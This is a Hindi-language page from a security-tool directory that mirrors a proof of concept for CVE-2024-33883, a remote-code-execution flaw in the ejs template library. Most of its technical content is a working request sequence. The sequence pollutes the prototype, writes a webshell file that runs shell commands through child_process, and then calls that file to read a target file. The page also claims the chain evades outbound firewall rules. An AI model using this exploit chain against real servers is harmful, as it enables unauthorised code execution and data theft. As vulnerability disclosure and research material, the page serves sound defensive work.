Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC-CVE-2024-33883 — CVE-2024-33883 का PoC, ejs की RCE भेद्यता। | Kitploit
उपकरण/GitHubGitHub/grantzile/poc-cve-2024-33883
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubgrantzile/poc-cve-2024-33883

PoC-CVE-2024-33883

CVE-2024-33883 का PoC, ejs की RCE भेद्यता।

रिपॉजिटरी देखें
522 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-33883

[email protected], अपर्याप्त प्रोटोटाइप प्रदूषण सत्यापन जिससे RCE शोषण होता है

  • प्रोटोटाइप प्रदूषण के साथ, opts.client को truthy मान पर सेट करें (शर्त)
  • फिर, जब render() चलता है, ejs opts.escapeFunction के मान को JS कोड के रूप में चलाएगा।

असुरक्षित कोड रेंज

[email protected] पर आधारित

1. ejs/lib/ejs.js - line 580, 636, 637

PoC (वेबशेल इंजेक्ट करें और सक्रिय करें)

root@kitploit:~
1. GET /pollute?target=client&value=1

2. GET /pollute?target=escapeFunction&value=process.mainModule.require("fs").writeFileSync('./payload.js', "function RCE( key ){ \n const result = process.mainModule.require('child_process').execSync(`${key}`); \n throw new Error(`Result leak from Error: ${result.toString()}`); \n}\n module.exports = RCE;");

3. GET /
- Inject webshell

4. GET /pollute?target=escapeFunction&value=process.mainModule.require("./payload.js")("cat ./Leak_target");

5. GET /
- Activate webshell
  • उपरोक्त PoC ufw फ़ायरवॉल के आउटबाउंड पैकेट ड्रॉप को बायपास कर सकता है।

  • 3.1.10 से नीचे के सभी संस्करण इस प्रकार के हमले के लिए असुरक्षित हैं।

  • यह एक RCE भेद्यता है, और इसे लाइव सर्वर पर दुरुपयोग न करें।

हमले के लिए उपलब्ध शर्तें

  1. render() पर नियंत्रण आवश्यक है।
  2. प्रोटोटाइप प्रदूषण हमले वेक्टर पर नियंत्रण आवश्यक है।
  • उपरोक्त दो शर्तें पूरी होने पर, RCE हमला उपलब्ध है।

मैं इस हमले को कैसे रोक सकता हूँ?

  • फिक्स्ड संस्करण ([email protected]) अब उपलब्ध है।
टूल डाउनलोड करें